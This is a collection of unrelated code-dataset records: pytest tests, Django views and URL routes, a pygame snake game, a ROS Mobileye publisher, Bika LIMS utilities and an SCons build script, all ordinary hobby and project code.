assert match in captured.out\n\n\ndef test_client_delete_key(monkeypatch, caplog):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO('{\"key\":{\"braking\":\"litho\",\"retrograde\":true}}')),\n )\n\n assert client.delete_key(argparse.Namespace(alias=\"hurr\"), \"unknown\")\n assert \"deleted key\" in caplog.text\n\n\n@pytest.mark.parametrize(\n (\"user\", \"secret\", \"file_exists\", \"file_content\", \"write_matches\"),\n [\n pytest.param(\n \"daffy\",\n \"woohoo\",\n True,\n '[server \"http://weau\"]\\ncredentials = daffy:bugsdrools\\n',\n (\"^credentials = daffy:woohoo\", \"^credentials = daffy:bugsdrools\"),\n id=\"existing\",\n ),\n pytest.param(\n \"sam\",\n \"varmint\",\n True,\n \"\",\n (\"^credentials = sam:varmint\",),\n id=\"existing_empty\",\n ),\n pytest.param(\n \"foghorn\",\n \"wellahseenow\",\n False,\n \"\",\n (\"^credentials = foghorn:wellahseenow\",),\n id=\"new_config\",\n ),\n ],\n)\ndef test_client__write_credentials(\n monkeypatch, user, secret, file_exists, file_content, write_matches\n):\n state = {\"out\": io.StringIO()}\n\n class FakeFile:\n def exists(self):\n return file_exists\n\n @contextlib.contextmanager\n def open(self, mode: str = \"r\"):\n assert mode in (\"r\", \"w\")\n if mode == \"r\":\n yield io.StringIO(file_content)\n elif mode == \"w\":\n yield state[\"out\"]\n\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(client, \"_credentials_file\", FakeFile())\n\n client._write_credentials(user, secret)\n assert client._cached_credentials is None\n state[\"out\"].seek(0)\n written = state[\"out\"].read()\n assert \"# WARNING:\" in written\n for write_match in write_matches:\n assert re.search(write_match, written, re.MULTILINE) is not None\n","sub_path":"tests/test_fuzzbucket_client.py","file_name":"test_fuzzbucket_client.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78488627","text":"from datetime import timedelta\nfrom typing import List\n\nfrom crud.measurement import LoggingDatabase\nfrom db.workbench_helper import WorkbenchHelper\nfrom models.measurement import Measurement\nfrom schemas.measurement import MeasurementCreate\n\n\ndef test_create_tables() -> None:\n db = LoggingDatabase()\n db.create_tables()\n\n assert True\n\n\ndef test_measurements_insert() -> None:\n db = LoggingDatabase()\n measurement = MeasurementCreate(\n i_device_id=1,\n i_channel_id=1,\n i_measurement_type=1,\n i_value=WorkbenchHelper.get_float_with_variation(\n mid_point=5, max_variation=0.5, decimal_places=1\n ),\n d_datetime=WorkbenchHelper.get_datetime_now_to_nearest_sec(),\n )\n db_measurement = db.insert_measurement(measurement)\n\n assert db_measurement.i_id is not None\n\n measurement = MeasurementCreate(\n i_measurement_type=2,\n i_device_id=1,\n i_channel_id=1,\n d_datetime=WorkbenchHelper.get_datetime_now_to_nearest_sec(),\n i_value=WorkbenchHelper.get_float_with_variation(\n mid_point=0.300, max_variation=0.050, decimal_places=3\n ),\n )\n\n db_measurement = db.insert_measurement(measurement)\n assert db_measurement.i_id is not None\n\n\ndef test_measurements_get_all_measurements() -> None:\n db = LoggingDatabase()\n measurements: List[Measurement] = db.get_all_measurements()\n\n assert len(measurements) > 0\n\n\ndef test_measurements_get_measurements_in_last_timedelta() -> None:\n db = LoggingDatabase()\n measurements: List[Measurement] = db.get_measurements_in_last_timedelta(\n period=timedelta(minutes=60)\n )\n\n assert len(measurements) > 0\n\n\ndef test_get_by_query() -> None:\n db = LoggingDatabase()\n result = db.get_by_query(\"public.measurements\")\n\n assert len(result) > 0\n","sub_path":"workbench_web/backend/app/app/tests/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570728364","text":"from django.urls import path \nfrom . import views \nfrom .views import (\n PostListView,\n PostDetailView,\n PostCreateView,\n PostUpdateView,\n PostDeleteView,\n CommentCreateView,\n LikeView,\n UserPostListView\n )\n\nurlpatterns = [\n path(\"about/\",views.about,name=\"about\"),\n path(\"\",PostListView.as_view(),name=\"posts-home\"),\n path(\"post//\",PostDetailView.as_view(),name=\"post-detail\"),\n path(\"post/new/\",PostCreateView.as_view(),name=\"post-create\"),\n path(\"post//update\",PostUpdateView.as_view(),name=\"post-update\"),\n path(\"post//delete\",PostDeleteView.as_view(),name=\"post-delete\"),\n path(\"post//comment\",CommentCreateView.as_view(),name=\"comment-create\"),\n path(\"like/\",LikeView,name=\"like_post\"),\n path(\"user/\",UserPostListView.as_view(),name=\"user_posts\")\n]\n\n\n","sub_path":"mysite/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25176606","text":"import random, pygame, sys\r\nimport time\r\nimport timeit\r\nimport itertools\r\nimport os\r\nfrom pygame.locals import *\r\nimport mainmenu,game\r\npygame.init()\r\n\r\n\r\ndef randomimg(imglist):\r\n \"\"\"gets a list of imgages in .png and returns a random img.png\"\"\"\r\n img = random.choice(imglist)\r\n return img\r\n\r\n\r\ndef initgame():\r\n # pre-render stuff\r\n global ENDGAME, WIDTH, HEIGHT, ALLXY # ALLXY - all coordinates on the screen\r\n global WHITE, GREEN, BLUE, BLACK, RED\r\n global fontObj, textSurfaceDead, textRectDead\r\n global BLUEBALLIMGLIST, REDBALLIMGLIST\r\n\r\n cwd = os.getcwd()\r\n REDBALLIMGLIST = []\r\n BLUEBALLIMGLIST = []\r\n for num in range(1, 6):\r\n currentimg = cwd+'\\images\\\\redball' + str(num) + '.png'\r\n REDBALLIMGLIST.append(currentimg)\r\n\r\n currentimg = cwd+'\\images\\\\blueball' + str(num) + '.png'\r\n BLUEBALLIMGLIST.append(currentimg)\r\n\r\n WIDTH = 1360\r\n HEIGHT = 760\r\n\r\n ENDGAME = False\r\n\r\n allx = [x for x in range(0, int((WIDTH + 20) / 20))]\r\n ally = [y for y in range(0, int((HEIGHT + 20) / 20))]\r\n ALLXY = []\r\n ALLXY.append(allx)\r\n ALLXY.append(ally)\r\n\r\n ALLXY = list(itertools.product(*ALLXY))\r\n\r\n WHITE = (255, 255, 255)\r\n GREEN = (0, 255, 0)\r\n BLUE = (0, 0, 255)\r\n BLACK = (0, 0, 0)\r\n RED = (255, 0, 0)\r\n\r\n fontObj = pygame.font.Font('freesansbold.ttf', 32)\r\n\r\n colors = [WHITE, GREEN, BLUE, BLACK, RED]\r\n\r\n\r\nclass Player(object):\r\n def __init__(self, name=None, score=0):\r\n self.name = name\r\n self.score = score\r\n\r\n def setname(name):\r\n pass\r\n\r\n def getname():\r\n return self.name\r\n\r\n def updatescore(score):\r\n self.score += score\r\n\r\n def getscore():\r\n return self.score\r\n\r\n\r\nclass Board(object):\r\n def __init__(self, allboard=[], snakespos={}):\r\n self.allboard = allboard\r\n self.snakespos = snakespos\r\n self.fruitpos = []\r\n\r\n def init(self):\r\n allx = [x for x in range(0, int((WIDTH + 20) / 20))]\r\n ally = [y for y in range(0, int((HEIGHT + 20) / 20))]\r\n self.allboard.append(allx)\r\n self.allboard.append(ally)\r\n\r\n self.allboard = list(itertools.product(*self.allboard))\r\n\r\n def update(self, fruit, s1=[], s2=[], s3=[], s4=[]):\r\n del self.fruitpos[:]\r\n if s1 == []:\r\n pass\r\n else:\r\n self.snakespos['s1'] = s1.body\r\n if s2 == []:\r\n pass\r\n else:\r\n self.snakespos['s2'] = s2.body\r\n if s3 == []:\r\n pass\r\n else:\r\n self.snakespos['s3'] = s3.body\r\n if s4 == []:\r\n pass\r\n else:\r\n self.snakespos['s4'] = s4.body\r\n self.fruitpos = []\r\n self.fruitpos.extend(fruit.pos)\r\n\r\n def getsnakespos(self):\r\n return self.snakespos\r\n\r\n def getfruitpos(self):\r\n\r\n return self.fruitpos\r\n\r\n\r\nclass Snake(object):\r\n drawobj = None\r\n\r\n def __init__(self, body=[], dirmem=[], stat='stop', color=None):\r\n self.body = []\r\n self.dirmem = [] # direction memory\r\n self.state = 'stop'\r\n self.color = color\r\n\r\n def init(self, xpos, ypos, bodylength, color): # needs to be from 10 up in jumps of 20 e.g: 10,30,...,310,330...\r\n for part in range(bodylength):\r\n self.body.append([xpos, ypos])\r\n xpos -= 20\r\n if xpos < 0:\r\n xpos = WIDTH - 10\r\n self.dirmem.append('right')\r\n self.color = color\r\n\r\n def move(self, direction):\r\n\r\n # opposite direction check\r\n if self.state == 'dead':\r\n return\r\n if (self.dirmem[0] == 'up' and direction == 'down') or (self.dirmem[0] == 'down' and direction == 'up') or (\r\n self.dirmem[0] == 'left' and direction == 'right') or (\r\n self.dirmem[0] == 'right' and direction == 'left'):\r\n direction = self.dirmem[0]\r\n self.dirmem.pop()\r\n self.dirmem.insert(0, direction)\r\n\r\n i = 0\r\n for ele in self.dirmem:\r\n if ele == 'up':\r\n self.body[i][1] -= 20\r\n if ele == 'down':\r\n self.body[i][1] += 20\r\n if ele == 'right':\r\n self.body[i][0] += 20\r\n if ele == 'left':\r\n self.body[i][0] -= 20\r\n # border check\r\n if self.body[i][1] > HEIGHT:\r\n self.body[i][1] = 10\r\n elif self.body[i][1] < 0:\r\n self.body[i][1] = HEIGHT - 10\r\n if self.body[i][0] > WIDTH:\r\n self.body[i][0] = 10\r\n elif self.body[i][0] < 0:\r\n self.body[i][0] = WIDTH - 10\r\n i += 1\r\n\r\n def grow(self):\r\n movex = 0\r\n movey = 0\r\n if self.dirmem[-1] == 'up':\r\n movey = 20\r\n elif self.dirmem[-1] == 'down':\r\n movey = -20\r\n elif self.dirmem[-1] == 'left':\r\n movex = 20\r\n elif self.dirmem[-1] == 'right':\r\n movex = -20\r\n self.dirmem.insert(len(self.dirmem), self.dirmem[-1])\r\n self.body.append([self.body[-1][0] + movex, self.body[-1][1] + movey])\r\n\r\n def draw(self):\r\n for part in self.body:\r\n # pygame.draw.circle(DISPLAYSURF,self.color,part,10,0)\r\n\r\n if self.color == BLUE:\r\n img = BLUEBALLIMGLIST\r\n if self.color == RED:\r\n img = REDBALLIMGLIST\r\n ballimg = pygame.image.load(randomimg(img))\r\n DISPLAYSURF.blit(ballimg, [part[0] - 10, part[1] - 10])\r\n\r\n def collide(self, board):\r\n if self.state != 'dead':\r\n head = self.body[0]\r\n # snake collided with itself\r\n for part in self.body[1:]:\r\n if head == part:\r\n print('collided with self')\r\n return 'dead'\r\n # snake collided with a fruit\r\n if head == board.fruitpos:\r\n self.state = 'eat'\r\n return self.state\r\n # snake collided with another snake\r\n for snake in board.snakespos.values():\r\n if snake != self.body:\r\n for part in snake:\r\n if head == part:\r\n print('collided with another snake')\r\n return 'dead'\r\n\r\n def dead(self):\r\n self.state = 'dead'\r\n text = 'p1 Ate Himself... His size at the time of death was ' + str(len(self.body))\r\n textSurfaceDead = fontObj.render(text, True, WHITE, BLUE)\r\n textRectDead = textSurfaceDead.get_rect()\r\n textRectDead.center = (WIDTH / 2, HEIGHT / 2)\r\n DISPLAYSURF.blit(textSurfaceDead, textRectDead)\r\n del self.body[:]\r\n\r\n\r\nclass Fruit(object):\r\n def __init__(self, pos=[]):\r\n self.pos = pos\r\n\r\n def init(self, board):\r\n\r\n del self.pos[:]\r\n\r\n allowed = []\r\n allowed.extend(board.allboard)\r\n for snake in board.snakespos.values():\r\n\r\n for part in snake:\r\n allowed.remove((int(part[0] / 20), int(part[1] / 20)))\r\n temp = random.choice(allowed) # temp becuase cant change tuple\r\n xpos = temp[0] * 20\r\n ypos = temp[1] * 20\r\n\r\n if xpos + 10 > WIDTH:\r\n xpos -= 10\r\n else:\r\n xpos += 10\r\n if ypos + 10 > HEIGHT:\r\n ypos -= 10\r\n else:\r\n ypos += 10\r\n pos = [xpos, ypos]\r\n self.pos.extend(pos)\r\n\r\n del allowed\r\n\r\n def draw(self):\r\n pygame.draw.circle(DISPLAYSURF, RED, self.pos, 10, 0)\r\n\r\n\r\ndef checkcollision(snake, fruit):\r\n head = snake.body[0]\r\n for part in snake.body[1:]:\r\n if head == part:\r\n return 'dead'\r\n if head == fruit.pos:\r\n return 'eat'\r\n\r\n return False\r\n\r\n\r\nFPS = 10\r\nfpsClock = pygame.time.Clock()\r\n\r\ninitgame()\r\n\r\nDISPLAYSURF = pygame.display.set_mode((WIDTH, HEIGHT), FULLSCREEN) # for full screen add flag: FULLSCREEN\r\n\r\npygame.display.set_caption('Snake')\r\n\r\nboard = Board()\r\nboard.init()\r\ns1 = Snake()\r\ns2 = Snake()\r\nsnakes = [s1, s2]\r\ns1.init(310, 70, 8, BLUE)\r\ns2.init(50, 30, 8, RED)\r\nf1 = Fruit()\r\n\r\nboard.update(f1, s1, s2)\r\n\r\nf1.init(board)\r\n\r\np1direction = 'right'\r\np2direction = 'right'\r\nmainmenu.mainmenu()\r\nwhile True:\r\n board.update(f1, s1, s2)\r\n if ENDGAME == False:\r\n DISPLAYSURF.fill(BLACK)\r\n if s1.state != 'dead':\r\n s1.move(p1direction)\r\n s1.draw()\r\n if s2.state != 'dead':\r\n s2.move(p2direction)\r\n s2.draw()\r\n f1.draw()\r\n if s1.collide(board) == 'dead' and s2.collide(board) == 'dead':\r\n ENDGAME = True\r\n if s1.collide(board) == 'dead' and ENDGAME == False:\r\n print('boom')\r\n s1.dead()\r\n board.update(f1, s1, s2)\r\n print(s1.body)\r\n if s1.collide(board) == 'eat':\r\n f1.init(board)\r\n s1.draw()\r\n f1.draw()\r\n s1.grow()\r\n FPS += 1\r\n if s2.collide(board) == 'dead' and ENDGAME == False:\r\n print('boom')\r\n s2.dead()\r\n board.update(f1, s1, s2)\r\n if s2.collide(board) == 'eat':\r\n f1.init(board)\r\n s2.draw()\r\n f1.draw()\r\n s2.grow()\r\n FPS += 1\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n fontObj = 0\r\n pygame.display.quit()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n # p1 keys\r\n if event.key == K_UP:\r\n p1direction = 'up'\r\n if event.key == K_DOWN:\r\n p1direction = 'down'\r\n if event.key == K_RIGHT:\r\n p1direction = 'right'\r\n if event.key == K_LEFT:\r\n p1direction = 'left'\r\n # p2 keys\r\n if event.key == K_w:\r\n p2direction = 'up'\r\n if event.key == K_s:\r\n p2direction = 'down'\r\n if event.key == K_d:\r\n p2direction = 'right'\r\n if event.key == K_a:\r\n p2direction = 'left'\r\n\r\n if event.key == K_q:\r\n fontObj = 0\r\n pygame.display.quit()\r\n pygame.quit()\r\n sys.exit()\r\n pygame.display.update()\r\n fpsClock.tick(FPS)","sub_path":"PycharmProjects/snakepygame/snakeworks.py","file_name":"snakeworks.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"119765281","text":"from django.shortcuts import render,redirect\nfrom .forms import SignUpForm,EmployeeForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger,EmptyPage\nfrom .models import Employee\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic import DetailView\nfrom django.views.generic.edit import CreateView,UpdateView,DeleteView\nfrom django.forms import widgets\nfrom django.urls import reverse_lazy\n\n# Create your views here.\ndef SignUp(request):\n form = SignUpForm()\n if request.method=='POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.set_password(user.password)\n return redirect('login')\n else:\n print('Invalid data')\n return render(request,'BowserApp/sign_up.html',locals())\n return render(request,'BowserApp/sign_up.html',locals())\n\n@login_required\ndef home_page(request):\n return render(request,'BowserApp/home_page.html')\n\n@login_required\ndef add_emp_view(request):\n form = EmployeeForm()\n if request.method=='POST':\n form = EmployeeForm(data=request.POST,files=request.FILES)\n if form.is_valid():\n form.save()\n return redirect('emp_list')\n return render(request,'BowserApp/forms.html',locals())\n\n@login_required\ndef Emp_list_view(request):\n emp_list = Employee.objects.all()\n # paginator = Paginator(emp_list,10)\n # page_number = request.GET('page')\n # try:\n # emp_list = paginator.page(page_number)\n # except PageNotAnInteger:\n # emp_list = paginator.page(1)\n # except EmptyPage:\n # emp_list = paginator.page(paginator.num_pages)\n return render(request,'BowserApp/emp_list.html',locals())\n\nclass EmployeeDetailView(LoginRequiredMixin, DetailView):\n model = Employee\n template_name = 'BowserApp/emp_detail.html'\n\n def get_context_data(self,**kwargs):\n context = super(EmployeeDetailView, self).get_context_data(**kwargs)\n return context\n\nclass EmployeeDeleteView(LoginRequiredMixin, DeleteView):\n model = Employee\n success_url = reverse_lazy('emp_list')\n\nclass EmployeeUpdateView(LoginRequiredMixin, UpdateView, SuccessMessageMixin):\n model = Employee\n fields = '__all__'\n sucess_message = \"Recond Successfully Updated!\"\n\n def get_form(self):\n form = super(EmployeeUpdateView, self).get_form()\n form.fields['emp_id'].widget = widgets.Textarea(attrs={'rows':1})\n form.fields['emp_first_name'].widget = widgets.Textarea(attrs={'rows':1})\n form.fields['emp_last_name'].widget = widgets.Textarea(attrs={'rows':1})\n form.fields['emp_date_of_birth'].widget = widgets.DateInput(attrs={'type':'date'})\n form.fields['emp_address1'].widget = widgets.Textarea(attrs={'rows':2})\n form.fields['emp_address2'].widget = widgets.Textarea(attrs={'rows':2})\n form.fields['emp_zip_code'].widget = widgets.Textarea(attrs={'rows':1})\n form.fields['emp_city'].widget = widgets.Textarea(attrs={'rows':1})\n form.fields['emp_mobile_no'].widget = widgets.Textarea(attrs={'rows':1})\n return form\n","sub_path":"BowserProject/BowserApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452202070","text":"#!/usr/bin/env python\n\n###############################################################################\n# Copyright 2017 The Apollo Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\n\"\"\"\nFor GTA5\n\"\"\"\n#import os\n#import sys\n#import json\nimport time\nimport random\nimport rospy\n\nfrom modules.drivers.proto import mobileye_pb2\n\n\ndef mobileye_data(mobileye,count,q):\n # mobileye.header.timestamp_sec = 1\n # mobileye.header.module_name = 2\n # mobileye.header.sequence_num = 3\n # mobileye.header.lidar_timestamp = 4\n # mobileye.header.camera_timestamp = 5\n # mobileye.header.radar_timstamp = 6\n # mobileye.header.version = 7\n # mobileye.header.status = 8\n # if q.empty():\n # continue\n mobileye_list = q\n count = 0\n for data in mobileye_list:\n\n mobileye.header.timestamp_sec = time.time()\n mobileye.header.module_name = 'mobileye'\n mobileye.header.sequence_num = count #YYZmodfy 1122\n return mobileye\n # outman = mobileye.details_739.add()\n # outman.obstacle_id = data.obstacle_id\n # outman.obstacle_pos_x = data.obstacle_x\n # outman.obstacle_pos_y = data.obstacle_y\n # outman.obstacle_rel_vel_x = data.obstacle_rel_vel_x\n # outman.obstacle_type = data.obstacle_type\n # outman.obstacle_status = data.obstacle_status\n #\n # outman = mobileye.details_73a.add()\n # outman.obstacle_length = data.obstacle_length\n # outman.obstacle_width = data.obstacle_width\n '''\n outman = mobileye.details_73b.add()\n outman.object_accel_x = data.obstacle_acc\n outman.obstacle_angle = data.obstacle_angle\n '''\n # return mobileye\n\ndef main():\n rospy.init_node(\"mobileye_offline\", anonymous=True)\n mobileye_pub = rospy.Publisher(\n \"/apollo/sensor/mobileye\", mobileye_pb2.Mobileye, queue_size=1)\n # generate mobileye info\n mobileye = mobileye_pb2.Mobileye()\n\n # obstacles_list = []\n # obstacle_object = Obstacle(1,random.randint(10,20))\n # obstacles_list.append(obstacle_object)\n # q = obstacles_list\n #1,1,1,1,1,1,1,1,\n\n # send pose to /apollo/drivers/mobileye\n count = 0\n r = rospy.Rate(1)\n while not rospy.is_shutdown():\n mobileye_pub.publish(mobileye_data(mobileye,count,q))\n count += 1\n r.sleep()\n\n#class Obstacle:\n # def __init__(self,angle,acc):\n # self.obstacle_id = id_ob #range 0:63\n # self.obstacle_type = type_ob #range 0:7 0-Vehicle 1-Truck 2-Bike 3-Ped 4-Bicycle 5-Unused\n # self.obstacle_x = x\n # self.obstacle_y = y\n # self.obstacle_angle = angle #range -327.68:327.68 Unit:degree\n # #obstacle_speed = speed\n # self.obstacle_length = length #range 0:31 Unite:meter\n # self.obstacle_width = width #range 0:12.5 Unite:meter\n # self.obstacle_acc = acc\n # self.obstacle_rel_vel_x = rel_vel_x #Longitudinal relative velocity\n # self.obstacle_status = status #0-undefined 1-standing 2-stopped 3-moving 4-oncoming 5-parked 6-unused\n\n #id_ob,type_ob,x,y,length,width,,rel_vel_x,status\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"gta_gps/bak/mobileye_tets.py","file_name":"mobileye_tets.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424259073","text":"from AccessControl import ModuleSecurityInfo, allow_module\nfrom DateTime import DateTime\nfrom Products.Archetypes.public import DisplayList\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.TranslationServiceTool import TranslationServiceTool\nfrom Products.Five.browser import BrowserView\nfrom bika.lims import bikaMessageFactory as _\nfrom bika.lims import interfaces\nfrom bika.lims import logger\nfrom bika.lims.config import Publish\nfrom email.Utils import formataddr\nfrom plone.i18n.normalizer.interfaces import IIDNormalizer\nfrom reportlab.graphics.barcode import getCodes, getCodeNames, createBarcodeDrawing\nfrom zope.component import getUtility\nfrom zope.interface import providedBy\nimport copy,re,urllib\nimport plone.protect\nimport transaction\n\nModuleSecurityInfo('email.Utils').declarePublic('formataddr')\nallow_module('csv')\n\n# Wrapper for PortalTransport's sendmail - don't know why there sendmail\n# method is marked private\nModuleSecurityInfo('Products.bika.utils').declarePublic('sendmail')\n#Protected( Publish, 'sendmail')\ndef sendmail(portal, from_addr, to_addrs, msg):\n mailspool = portal.portal_mailspool\n mailspool.sendmail(from_addr, to_addrs, msg)\n\nModuleSecurityInfo('Products.bika.utils').declarePublic('printfile')\ndef printfile(portal, from_addr, to_addrs, msg):\n import os\n\n \"\"\" set the path, then the cmd 'lpr filepath'\n temp_path = 'C:/Zope2/Products/Bika/version.txt'\n\n os.system('lpr \"%s\"' %temp_path)\n \"\"\"\n pass\n\ndef getAnalysts(context):\n \"\"\" Present the LabManagers and Analysts as options for analyst\n \"\"\"\n mtool = getToolByName(context, 'portal_membership')\n pairs = []\n analysts = mtool.searchForMembers(roles = ['Manager', 'LabManager', 'Analyst'])\n for member in analysts:\n uid = member.getId()\n fullname = member.getProperty('fullname')\n if fullname is None:\n fullname = uid\n pairs.append((uid, fullname))\n pairs.sort(lambda x, y: cmp(x[1], y[1]))\n return DisplayList(pairs)\n\ndef isActive(obj):\n \"\"\" Check if obj is inactive or cancelled.\n \"\"\"\n wf = getToolByName(obj, 'portal_workflow')\n if (hasattr(obj, 'inactive_state') and obj.inactive_state == 'inactive') or \\\n wf.getInfoFor(obj, 'inactive_state', 'active') == 'inactive':\n return False\n if (hasattr(obj, 'cancellation_state') and obj.inactive_state == 'cancelled') or \\\n wf.getInfoFor(obj, 'cancellation_state', 'active') == 'cancelled':\n return False\n return True\n\ndef TimeOrDate(context, datetime, long_format = False):\n \"\"\" Return the Time date is today,\n otherwise return the Date.\n XXX timeordate needs long/short/time/date formats in bika_setup\n\"\"\"\n localLongTimeFormat = context.portal_properties.site_properties.localLongTimeFormat\n localTimeFormat = context.portal_properties.site_properties.localTimeFormat\n localTimeOnlyFormat = context.portal_properties.site_properties.localTimeOnlyFormat\n\n if hasattr(datetime, 'Date'):\n if (datetime.Date() > DateTime().Date()) or long_format:\n dt = datetime.asdatetime().strftime(localLongTimeFormat)\n elif (datetime.Date() < DateTime().Date()):\n dt = datetime.asdatetime().strftime(\"%d %b %Y\")\n elif datetime.Date() == DateTime().Date():\n dt = datetime.asdatetime().strftime(localTimeOnlyFormat)\n else:\n dt = datetime.asdatetime().strftime(localTimeFormat)\n dt = dt.replace(\"PM\", \"pm\").replace(\"AM\", \"am\")\n if len(dt) > 10:\n dt = dt.replace(\"12:00 am\", \"\")\n if dt == \"12:00 am\":\n dt = datetime.asdatetime().strftime(localTimeFormat)\n else:\n dt = datetime\n return dt\n\nclass ajaxGetObject(BrowserView):\n \"\"\" return redirect url if the item exists\n passes the request to portal_catalog\n requires '_authenticator' in request.\n \"\"\"\n def __call__(self):\n try:\n plone.protect.CheckAuthenticator(self.request)\n plone.protect.PostOnly(self.request)\n except:\n return \"\"\n pc = getToolByName(self.context, 'portal_catalog')\n id = self.request.get(\"id\", '').replace(\"*\", \"\")\n items = pc(self.request)\n if items:\n return items[0].getObject().absolute_url()\n\n# encode_header function copied from roundup's rfc2822 package.\nhqre = re.compile(r'^[A-z0-9!\"#$%%&\\'()*+,-./:;<=>?@\\[\\]^_`{|}~ ]+$')\n\nModuleSecurityInfo('Products.bika.utils').declarePublic('encode_header')\ndef encode_header(header, charset = 'utf-8'):\n \"\"\" Will encode in quoted-printable encoding only if header\n contains non latin characters\n \"\"\"\n\n # Return empty headers unchanged\n if not header:\n return header\n\n # return plain header if it does not contain non-ascii characters\n if hqre.match(header):\n return header\n\n quoted = ''\n #max_encoded = 76 - len(charset) - 7\n for c in header:\n # Space may be represented as _ instead of =20 for readability\n if c == ' ':\n quoted += '_'\n # These characters can be included verbatim\n elif hqre.match(c):\n quoted += c\n # Otherwise, replace with hex value like =E2\n else:\n quoted += \"=%02X\" % ord(c)\n plain = 0\n\n return '=?%s?q?%s?=' % (charset, quoted)\n\ndef zero_fill(matchobj):\n return matchobj.group().zfill(8)\n\nnum_sort_regex = re.compile('\\d+')\n\nModuleSecurityInfo('Products.bika.utils').declarePublic('sortable_title')\ndef sortable_title(portal, title):\n \"\"\"Convert title to sortable title\n \"\"\"\n if not title:\n return ''\n\n def_charset = portal.plone_utils.getSiteEncoding()\n sortabletitle = title.lower().strip()\n # Replace numbers with zero filled numbers\n sortabletitle = num_sort_regex.sub(zero_fill, sortabletitle)\n # Truncate to prevent bloat\n for charset in [def_charset, 'latin-1', 'utf-8']:\n try:\n sortabletitle = unicode(sortabletitle, charset)[:30]\n sortabletitle = sortabletitle.encode(def_charset or 'utf-8')\n break\n except UnicodeError:\n pass\n except TypeError:\n # If we get a TypeError if we already have a unicode string\n sortabletitle = sortabletitle[:30]\n break\n return sortabletitle\n\ndef changeWorkflowState(content, state_id, acquire_permissions=False,\n portal_workflow=None, **kw):\n \"\"\"Change the workflow state of an object\n @param content: Content obj which state will be changed\n @param state_id: name of the state to put on content\n @param acquire_permissions: True->All permissions unchecked and on riles and\n acquired\n False->Applies new state security map\n @param portal_workflow: Provide workflow tool (optimisation) if known\n @param kw: change the values of same name of the state mapping\n @return: None\n \"\"\"\n\n if portal_workflow is None:\n portal_workflow = getToolByName(content, 'portal_workflow')\n\n # Might raise IndexError if no workflow is associated to this type\n wf_def = portal_workflow.getWorkflowsFor(content)[0]\n wf_id= wf_def.getId()\n\n wf_state = {\n 'action': None,\n 'actor': None,\n 'comments': \"Setting state to %s\" % state_id,\n 'review_state': state_id,\n 'time': DateTime(),\n }\n\n # Updating wf_state from keyword args\n for k in kw.keys():\n # Remove unknown items\n if not wf_state.has_key(k):\n del kw[k]\n if kw.has_key('review_state'):\n del kw['review_state']\n wf_state.update(kw)\n\n portal_workflow.setStatusOf(wf_id, content, wf_state)\n\n if acquire_permissions:\n # Acquire all permissions\n for permission in content.possible_permissions():\n content.manage_permission(permission, acquire=1)\n else:\n # Setting new state permissions\n wf_def.updateRoleMappingsFor(content)\n\n # Map changes to the catalogs\n content.reindexObject(idxs=['allowedRolesAndUsers', 'review_state'])\n return\n","sub_path":"bika/lims/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242694853","text":"import os\n\nlibrary_build_path = '#build/riak/'\nVariantDir(library_build_path, 'riak')\ncommon_env = Environment(\n ENV = os.environ,\n CXXFLAGS = ['--std=c++0x'],\n CPPPATH = ['/opt/local/include', '#', '#build/', '/usr/include'],\n LIBPATH = ['/opt/local/lib'])\n\nif ARGUMENTS.get('VERBOSE') != 'yes':\n common_env.Append(\n CXXCOMSTR = '(compile) $SOURCES',\n LINKCOMSTR = '(link) $TARGET',\n ARCOMSTR = '(archive) $TARGET',\n RANLIBCOMSTR = '(ranlib) $TARGET',\n PROTOCCOMSTR = '(protobuf) $TARGET'\n )\n\ndebug_env = common_env.Clone(CCFLAGS = ['-O0', '-g'])\n\nif ARGUMENTS.get('DEBUG') == 'yes':\n env = debug_env\nelse:\n env = common_env\n\nheaders = Glob(library_build_path + '*.hxx') + \\\n Glob(library_build_path + '*.pb.h')\ntransports = Glob(library_build_path + 'transports/*.hxx')\nsources = Glob(library_build_path + '*.cxx') + \\\n Glob(library_build_path + '*.proto') + \\\n Glob(library_build_path + 'transports/*.cxx')\nenv.Command(library_build_path + 'riakclient.pb.h', library_build_path + 'riakclient.proto', \"protoc $SOURCE --cpp_out=.\")\nenv.Command(library_build_path + 'riakclient.pb.cc', library_build_path + 'riakclient.proto', \"protoc $SOURCE 